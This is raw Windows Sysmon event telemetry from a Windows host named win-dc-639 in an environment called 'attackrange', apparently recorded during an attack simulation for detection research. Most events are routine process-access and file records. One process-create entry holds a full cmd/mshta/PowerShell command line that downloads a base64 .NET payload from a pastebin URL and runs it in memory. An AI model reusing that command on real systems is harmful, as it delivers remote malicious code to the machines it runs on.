08:00:52.392{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106992Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.392{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_q5ijvekw.ruz.ps12021-10-04 08:00:52.392 10341000x8000000000000000106991Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.377{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000106990Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:00:52.355{58E9C193-B4B4-615A-3D02-00000000FC01}7540\PSHost.132778080521173527.7540.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000106989Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.355{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000106988Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:00:52.355{58E9C193-B4B4-615A-3B02-00000000FC01}5176\PSHost.132778080521101741.5176.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000106987Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.339{58E9C193-B4B4-615A-3D02-00000000FC01}7540ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hsrilfjr.m40.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106986Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.339{58E9C193-B4B4-615A-3D02-00000000FC01}7540ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zza4zqdw.pua.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106985Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.308{58E9C193-B4B4-615A-3B02-00000000FC01}5176ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kb0a4bfj.eao.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106984Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.308{58E9C193-B4B4-615A-3B02-00000000FC01}5176ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yvucg42c.ojp.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106983Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.308{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zza4zqdw.pua.ps12021-10-04 08:00:52.308 10341000x8000000000000000106982Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.292{58E9C193-B4B4-615A-4302-00000000FC01}59844336C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-4902-00000000FC01}7300C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000106981Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.292{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yvucg42c.ojp.ps12021-10-04 08:00:52.292 10341000x8000000000000000106980Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106979Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106978Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106977Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106976Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4902-00000000FC01}7300C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106975Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-B4B4-615A-4202-00000000FC01}40127184C:\Windows\System32\cmd.exe{58E9C193-B4B4-615A-4902-00000000FC01}7300C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106974Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.287{58E9C193-B4B4-615A-4902-00000000FC01}7300C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B4B4-615A-4202-00000000FC01}4012C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106973Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106972Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106971Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106970Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106969Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106968Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106967Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-AE68-615A-C800-00000000FC01}45484844C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106966Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.277{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3D02-00000000FC01}7540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106965Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106964Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-3B02-00000000FC01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106963Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-B4B4-615A-4102-00000000FC01}67126372C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-4802-00000000FC01}7180C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106962Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106961Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106960Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106959Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 